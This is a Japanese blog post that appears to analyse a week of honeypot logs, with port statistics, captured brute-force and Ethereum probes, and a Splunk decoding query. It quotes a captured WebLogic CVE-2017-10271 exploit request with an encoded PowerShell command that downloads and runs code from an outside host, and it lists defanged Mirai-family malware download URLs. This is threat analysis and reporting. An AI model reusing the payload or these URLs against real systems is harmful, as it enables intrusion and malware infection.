以下の内容はhttps://sec-chick.hatenablog.com/entry/2018/10/09/200545より取得しました。


ハニーポット簡易分析(53-62日目:10/1-10/8)

長らく更新が止まってしまいましたが、10/1-10/9までのHoneytrapの簡易分析の結果です。

<宛先ポートごとの割合(80ポートを除く)>

f:id:one-chick-sec:20181009185633p:plain

<宛先ポートごとの検知数(80ポートを除く)>
※割合が0.5%以上

宛先ポート

検知数 割合(%) サービス
445 17843 45.3997 SMB
81 1082 2.75304 GoAhead Web Server 
22 1029 2.61819 SSH
3389 700 1.78108 RDP
1433 460 1.17042 Microsoft SQL Server
52869 366 0.93125 D-Link, Realtek SDK
502 359 0.91344 ?
8080 329 0.83711 PROCY
5555 234 0.59539 Android Debug Bridge
8222 221 0.56231 ?
6379 206 0.52415 Redis
8545 201 0.51142 Ethereum

 

<ポート 81>
◾️リクエス
GET / HTTP/1.1
Authorization: Basic YWRtaW46M2VkYzRyZnY=


◾️検知内容
Basic認証に関するリクエストで主にユーザー名:adminに対する総当たり攻撃でした。ここの集計はSplunkのサーチ文で抜き出しています。
<参考:利用したサーチ文>
※SplunkのApps DECRYPT が必要となります。
  また、Honeytrapのログはjson形式で取り込んでいます。

| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "Authorization\: Basic(?<Authorizationt_honeytrap>.+?)\."
| decrypt field="Authorizationt_honeytrap" atob emit('Authorizationt_honeytrap_decode')

<ポート 8545>
◾️リクエス
POST / HTTP/1.1
User-Agent: EtherRpcWrapper v0.1

{"version": "1.1", "params": [], "method": "eth_blockNumber", "id": 1}..

◾️検知内容
Ethereumに関する通信で一時に比べるとかなり減少しましたが、未だに継続して検知しています。

<ポート 7001>
◾️リクエス
POST /wls-wsat/CoordinatorPortType HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
~省略~
<string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
~省略~

◾️検知内容

WebLogic の WLS Security に対するコマンド実行(CVE-2017-10271)を狙った通信でPowerShellで難読化しています。難読化を解除すると以下の内容となります。
 → $OS=(Get-WmiObject Win32_OperatingSystem)Caption;$WC=New-Object NetWebClient;$WCHeadersAdd('User-Agent',"PowerShell/WL $OS");IEX $WCDownloadString('hxxp://121[.]17[.]28.[.]15/images/test/DLphp');

この宛先への通信はVTでは特にウイルス判定はないものの、Google先生ではいくつかヒットする内容となっています。おそらく、脆弱性があった場合に特定のURLへアクセスするだけの調査行為の通信と思われます。

ダウンロードURL 検知数 新規 VT
hxxp://104[.]248[.]189[.]214/tenshimips[.]mips 28   https://www.virustotal.com/#/url/cdb167260bf09c1b74b5fb932fd1647ba437f9b72a33317dc7ed81167beeed1e/detection
hxxp://107[.]191[.]99[.]230/elf[.]mips 132   https://www.virustotal.com/#/file/5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b/detection
hxxp://159[.]89[.]229[.]38/yakuza[.]mips 2 https://www.virustotal.com/#/file/d1950c7cced0825f6e9872d9b507467f7d1ca0c07a3e52e3b59ee756d301356b/detection
hxxp://185[.]162[.]130[.]187/adbs2 1   https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/
hxxp://185[.]61[.]138[.]151/NA39XX 1
Tsunami
https://www.virustotal.com/#/file/ee7ba15bae03a8095e0bf432a2f2674f2e78085258f64c137d2ad22bd96815a7/detection
hxxp://188[.]209[.]52[.]142/c 132   https://www.virustotal.com/#/url/8a392244d6648ac3fed7dcb98c79a24f89a5f6602ad007d2026e2cbf951547a8/detection
hxxp://198[.]199[.]66[.]110/Josho[.]mips 9 https://www.virustotal.com/#/url/94e8ea5c694acfbe030f4d59a8c84d399dcb1cf6166bf2f6ef023439beb99a8a/detection
hxxp://207[.]148[.]78[.]152/bc 1   https://www.virustotal.com/ja/url/c98d33aea5b9d6bbfc6db731d38ebdb16dfbaf65cb1896a628a0683f94b2b178/analysis/
hxxp://212[.]237[.]32[.]62/mips 1   https://www.virustotal.com/#/file/40e606c1d09c76d4681d3c745bf5dc261559b241c78ed9cb7baa59e6dcbb44ff/detection
hxxp://27[.]102[.]115[.]44/adbs2 1   https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/
hxxp://68[.]183[.]28[.]29/lawl 5 https://www.virustotal.com/#/url/7465c16f42cabe6620e580d9320b4f2ff15210a3e9001fc6e11bacf0b38be26b/detection
hxxp://76[.]74[.]177[.]230/oxy[.]mips 18 https://www.virustotal.com/#/url/4c38868f00090b372fe7b79a095f884d087d67a061ad15d161b1d9cdf324cc0c/detection
hxxp://76[.]74[.]177[.]230/seraph[.]mips 108
Mirai

https://www.virustotal.com/#/file/9296d11e4d72e95d21dc5bc395c5c3103fb2c467e200f180c10bab3dfe1df856/detection

主にMirai系のマルウェアがほとんどですが、yakuzaなどの日本語と思えるマルウェア名も検知していました。VTで確認する限り、明確にはmirai系と言い切れない結果であり、傾向が変化しているかもしれません。

以上、簡易分析となります。





以上の内容はhttps://sec-chick.hatenablog.com/entry/2018/10/09/200545より取得しました。
このページはhttp://font.textar.tv/のウェブフォントを使用してます

不具合報告/要望等はこちらへお願いします。
モバイルやる夫Viewer Ver0.14